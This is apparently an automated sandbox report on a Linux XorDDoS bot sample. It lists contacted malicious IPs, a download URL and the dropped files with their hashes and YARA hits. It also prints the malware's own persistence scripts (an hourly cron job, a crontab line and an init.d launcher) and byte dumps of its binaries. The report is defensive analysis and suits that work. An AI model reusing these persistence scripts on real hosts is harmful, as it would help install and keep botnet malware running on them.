https://ww.aass654.com/config.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9	eTASxT3bjO.elf, 5433.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5435.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5436.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5437.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5450.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5453.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5455.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5458.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5461.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5470.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5473.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5475.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5478.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5481.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5493.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5496.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5498.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5501.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5504.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5530.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5533.1.00000000ff8e3000.00000000ff904000.rw-.sdmp	false	Avira URL Cloud: safe	unknown
https://ww.aass654.com/config.rar	eTASxT3bjO.elf, 5433.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5435.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5436.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5437.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5450.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5453.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5455.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5458.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5461.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5470.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5473.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5475.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5478.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5481.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5493.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5496.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5498.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5501.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5504.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5530.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5533.1.00000000ff8e3000.00000000ff904000.rw-.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
137.175.88.241	ee.xxcc789.com	United States		54600	PEGTECHINCUS	true
199.188.111.217	unknown	United States		54600	PEGTECHINCUS	true

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
137.175.88.241	TmoTjBkSXT.elf	Get hash	malicious	XorDDoS	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PEGTECHINCUS	POR5tal0Pt.elf	Get hash	malicious	Mirai	Browse	199.33.215.90
	BxTzBn7FT0.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.243.156.249
	uOMKZwL0nj.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.247.76.169
	6H5iAAbeiB.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.247.76.139
	KCS20240042- cutoms clearance doc.exe	Get hash	malicious	FormBook	Browse	137.175.115.33
	wa3HVGbhyX.elf	Get hash	malicious	Mirai	Browse	108.186.219.248
	GQVUENt6FZ.exe	Get hash	malicious	FormBook	Browse	107.148.25.41
	5M49ccHuZr.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.247.76.116
	Ie0peIFNbb.elf	Get hash	malicious	Mirai	Browse	154.84.242.242
	MNGc8eGEPj.exe	Get hash	malicious	Redosdru	Browse	154.201.74.240
PEGTECHINCUS	POR5tal0Pt.elf	Get hash	malicious	Mirai	Browse	199.33.215.90
	BxTzBn7FT0.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.243.156.249
	uOMKZwL0nj.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.247.76.169
	6H5iAAbeiB.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.247.76.139
	KCS20240042- cutoms clearance doc.exe	Get hash	malicious	FormBook	Browse	137.175.115.33
	wa3HVGbhyX.elf	Get hash	malicious	Mirai	Browse	108.186.219.248
	GQVUENt6FZ.exe	Get hash	malicious	FormBook	Browse	107.148.25.41
	5M49ccHuZr.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.247.76.116
	Ie0peIFNbb.elf	Get hash	malicious	Mirai	Browse	154.84.242.242
	MNGc8eGEPj.exe	Get hash	malicious	Redosdru	Browse	154.201.74.240

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/cron.hourly/gcc.sh	TmoTjBkSXT.elf	Get hash	malicious	XorDDoS	Browse
	dptxrnhxmx.elf	Get hash	malicious	XorDDoS	Browse
	1.elf	Get hash	malicious	XorDDoS	Browse
	iJl2Sb6qRa	Get hash	malicious	XorDDoS	Browse
	Di1p3oLnDb.elf	Get hash	malicious	XorDDoS	Browse
	fuck.elf	Get hash	malicious	XorDDoS	Browse
	dkuidbsedp	Get hash	malicious	XorDDoS	Browse
	libudev.so	Get hash	malicious	XorDDoS	Browse
	23.vir	Get hash	malicious	XorDDoS	Browse
	23.vir	Get hash	malicious	XorDDoS	Browse

Created / dropped Files

/etc/cron.hourly/gcc.sh

Download File

Process:	/tmp/eTASxT3bjO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	228
Entropy (8bit):	4.807897441464882
Encrypted:	false
SSDEEP:	3:TKH4v1kxtsLNELQ9YmPQnMLnVMPQmlZnEMFaGZg28Xwf6SkCVcLNGLC75pkVKJdm:htiy4Mrm9lVNy28XbCVP270gJdE/v
MD5:	3BAB747CEDC5F0EBE86AAA7F982470CD
SHA1:	3C7D1C6931C2B3DAE39D38346B780EA57C8E6142
SHA-256:	74D31CAC40D98EE64DF2A0C29CEB229D12AC5FA699C2EE512FC69360F0CF68C5
SHA-512:	21E8A6D9CA8531D37DEF83D8903E5B0FA11ECF33D85D05EDAB1E0FEB4ACAC65AE2CF5222650FB9F533F459CCC51BB2903276FF6F827B847CC5E6DAC7D45A0A42
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Joe Sandbox View:	Filename: TmoTjBkSXT.elf, Detection: malicious, Browse Filename: dptxrnhxmx.elf, Detection: malicious, Browse Filename: 1.elf, Detection: malicious, Browse Filename: iJl2Sb6qRa, Detection: malicious, Browse Filename: Di1p3oLnDb.elf, Detection: malicious, Browse Filename: fuck.elf, Detection: malicious, Browse Filename: dkuidbsedp, Detection: malicious, Browse Filename: libudev.so, Detection: malicious, Browse Filename: 23.vir, Detection: malicious, Browse Filename: 23.vir, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/libudev.so /lib/libudev.so.6./lib/libudev.so.6.

/etc/crontab

Download File

Process:	/bin/sh
File Type:	ASCII text
Category:	dropped
Size (bytes):	41
Entropy (8bit):	3.8484226636198593
Encrypted:	false
SSDEEP:	3:FFP13tKebPv4KFcKv:/P1IebPPFcKv
MD5:	636299E19F3BFB8CDA661BC956C1CE7F
SHA1:	2B45273CCBFE139D58FC3554D6943D4338C18E15
SHA-256:	8CBDE8A027F2887DD7A3C5C6F98FDF127BAE31FE457FEF9D7945C9E48D195F44
SHA-512:	41AF1A49B86C9C81965AF32B404494CC5072AFDA004F385977110F8EA134A770650CBD2F9617AFCD87D6744954659BE4AE365E65DCA4491A375275E710310F1A
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	/3 * * * root /etc/cron.hourly/gcc.sh.

/etc/init.d/eTASxT3bjO.elf

Download File

Process:	/tmp/eTASxT3bjO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	335
Entropy (8bit):	5.335500177689838
Encrypted:	false
SSDEEP:	6:hUtoFdU9EdPHLsKheJLfHjBE21YJvmNeMwh/VRH11DzRILkOta6MzWkOtq4:6+CLbBEMO1nzuL7azW7N
MD5:	C626E5E917A129DFB7D48AD03FA91414
SHA1:	7305A01AC6A81CA1F51B2059418A00C9B5E10ED3
SHA-256:	BAE197C56391F0110892894A8539C9801753148EB71DBD7D72903944C34DBC5F
SHA-512:	7647A6D42B57DBFE841EF258CC5F93BA4AEB6DFFB9647BB7FFEDE4AC777C0609036BB9072B790F76001C3DCC2882F2837C7A8FEDF18BE65579D04A803BF8A092
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh.# chkconfig: 12345 90 90.# description: eTASxT3bjO.elf.### BEGIN INIT INFO.# Provides:..eTASxT3bjO.elf.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:.eTASxT3bjO.elf.### END INIT INFO.case $1 in.start)../tmp/eTASxT3bjO.elf..;;.stop)..;;.*)../tmp/eTASxT3bjO.elf..;;.esac.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/run/gcc.pid

Download File

Process:	/tmp/eTASxT3bjO.elf
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	3.965018266288633
Encrypted:	false
SSDEEP:	3:94x4OYc0CcJn:Cx4Lc6Jn
MD5:	7E8433C9C07527E89897FCAFB6F6AEEB
SHA1:	FFA9AFDF319AD75C023776203D57852E46959D2E
SHA-256:	16E964E10905780A9B26231C268CB3E5E7F327ED45881E67374D6D95E84F09C0
SHA-512:	C1B162C74EF264D58DAF50AAEE69629B08D918F395943CA54E12BE8861D59D8D509EE16E86E66974A3CFF0ECCA33BD950F91C04020A277ACD0F1E79A6AD5086B
Malicious:	false
Reputation:	low
Preview:	mecjptqjejekapeebkbmdyhaphnrwull

/usr/bin/eoogzzilvp

Download File

Process:	/tmp/eTASxT3bjO.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548627
Entropy (8bit):	6.1973627377865075
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbzP66ySjQn36EojH:/fUywKQ7Fb1pNL/p5PfjQn36EuH
MD5:	8674FC0A95E5D620AAC8FA064A44D827
SHA1:	C43FEC8F406FBF7637180713EA4FBFF89F12256E
SHA-256:	6310C13385D847294312E2E44CB0DB042414FA44694EEF1A0EDF033089201437
SHA-512:	9CC3BDBFB0085CB13C9905E5D7AA5374B66BC084070ABCD0CC248E60CF4B8D3D9B0B3ED851C032B194173EDCD54206DE87F3F7B013B2A9E308AED231DCEB052A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/eoogzzilvp, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/eoogzzilvp, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/eoogzzilvp, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/eoogzzilvp, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/evbjclrakz

Download File

Process:	/tmp/eTASxT3bjO.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548627
Entropy (8bit):	6.197372437975258
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbzP66ySjQn36Eoj1:/fUywKQ7Fb1pNL/p5PfjQn36Eu1
MD5:	D081C11279702C0CADDDC5E2840DED04
SHA1:	9C67ABF72F21102350222C5AFC120D1C2D34341E
SHA-256:	45F67EBC0A1771D42AC7626E2FE9DBC2AD72554EB04CD80E9224B6D08B380EBD
SHA-512:	10C5D03467C4A1BEA7EF0A079C897348C6F7EAD0B8FD5CDA4A93B5678CB2347EFDD28167ED03134A8A8C171686F3C0E68AD9EB8FA85D8917F917061B92C42891
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/evbjclrakz, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/evbjclrakz, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/evbjclrakz, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/evbjclrakz, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/exnwncfijy

Download File

Process:	/tmp/eTASxT3bjO.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548627
Entropy (8bit):	6.197372533148606
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbzP66ySjQn36EojK:/fUywKQ7Fb1pNL/p5PfjQn36EuK
MD5:	EA747A0616A82233B50727EB037CF577
SHA1:	1A516EE81A87CB211628A37E21092420CAFF2482
SHA-256:	1B78827E72C63E0D0CED9969B04F89FBEBEB18B4DABA2BC52E1FC529F32AD3C9
SHA-512:	7D13F42782F4F96E13693E7C93142820A5DF02E7365C52183211946D5CCFD5550C7756D60BC4EFA1083A4A86BCA3A1D8228CB9CAF45321C88583375E68432A58
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/exnwncfijy, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/exnwncfijy, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/exnwncfijy, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/exnwncfijy, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/ghgagimgub

Download File

Process:	/tmp/eTASxT3bjO.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548627
Entropy (8bit):	6.1973637361412734
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbzP66ySjQn36Eoje:/fUywKQ7Fb1pNL/p5PfjQn36Eue
MD5:	71B550D02A2581B9BDE1F77AACA91265
SHA1:	D853902A7D35E36481BC746E933D243341D8A003
SHA-256:	45A685BB1F60274259A3723BCDB5B9E1BEE05547890A706D5AB8D4823CC0ABF7
SHA-512:	131206853A0D8159B5F857A3DDE5177F5F2DFA2630C76CB28A887A0F0C936BCD383CE907E778173E58597D8F065156A1EFC122D2CCDF3A50E194077CBA5C9EBF
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ghgagimgub, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ghgagimgub, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ghgagimgub, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ghgagimgub, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/kffnhivjdw

Download File

Process:	/tmp/eTASxT3bjO.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548627
Entropy (8bit):	6.197367562992331
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbzP66ySjQn36Eojr:/fUywKQ7Fb1pNL/p5PfjQn36Eur
MD5:	EE25B9571B3552E8DA3D6F483DBA4DB6
SHA1:	2F20C9E60055054EAE37CB7EC5192E69F1640FAB
SHA-256:	536BB270F715FAC4B8F40802219C8D877407159B9F0A64C5A798D3E6AA2C04C6
SHA-512:	77A25CFB007DADD7DAD46F5D0529BC65F2003BE79344BEE76C8C8E882A70F321C861B12D1F4660F40C93110A82B0E6EDF368414D636FA6E35D98DB1FD85AFFB0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/kffnhivjdw, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/kffnhivjdw, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/kffnhivjdw, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/kffnhivjdw, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/mqnpjwpasf

Download File

Process:	/tmp/eTASxT3bjO.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548627
Entropy (8bit):	6.197367327211054
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbzP66ySjQn36Eoj1:/fUywKQ7Fb1pNL/p5PfjQn36Eu1
MD5:	66F0C34AE54C78C747182ED45C2EFB8C
SHA1:	1A597075A338C583187A9A8AD6E8C0E3156E509D
SHA-256:	3426FC1E0BB14C7FE175F04FA366C9A2C98FD978F55CD8BF52BC64D6536D9E52
SHA-512:	7551E7648BC27F2A3D6E9CB9FED3881D91EC504BD0880D7A5500CB3DCF8153B84E597A72F3A65490461CF2A082EB89EDBF10BBFAA83882DDEE3AD815805AF024
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/mqnpjwpasf, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/mqnpjwpasf, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/mqnpjwpasf, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/mqnpjwpasf, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/svkksitypo

Download File

Process:	/tmp/eTASxT3bjO.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548627
Entropy (8bit):	6.197369333540109
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbzP66ySjQn36EojW:/fUywKQ7Fb1pNL/p5PfjQn36EuW
MD5:	569E47223DF9DABC4C719A2764A624B5
SHA1:	B1BE13A1A9FB4DFDB9BD9DAD30E13192FEF1149F
SHA-256:	41BC8034A77E82AD1E9608F5E58938F640E49670E9D9FA470B65ADC870F37CFC
SHA-512:	A62373574D58585808E5E4A075238986C94EBEF32D9A658B819AF34C814E0AC6F3058579F97A0A2A4ED7522A38D6648C2D725C0462C01BCAE296CDC7684B0B9B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/svkksitypo, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/svkksitypo, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/svkksitypo, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/svkksitypo, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/uruvhkrplh

Download File

Process:	/tmp/eTASxT3bjO.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548627
Entropy (8bit):	6.197360691178704
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbzP66ySjQn36EojE:/fUywKQ7Fb1pNL/p5PfjQn36EuE
MD5:	EF17C32FC05C6B3CC1A419A8E88475EC
SHA1:	2890E49D6646F2DC907E89CF357B235C5E39CD7E
SHA-256:	6CBC95DBD3D5F3F9265B7FC9E0365DA62BEE6B6AF9B20D5CCDE745389CBA7689
SHA-512:	325E87D219771FA43F98739A959A177C97032DB672180FC638420C4F3D802B7F42F1965E42B53C48AB086FDE44084DE356ECA409003F49917014A837310F0EAD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/uruvhkrplh, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/uruvhkrplh, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/uruvhkrplh, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/uruvhkrplh, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
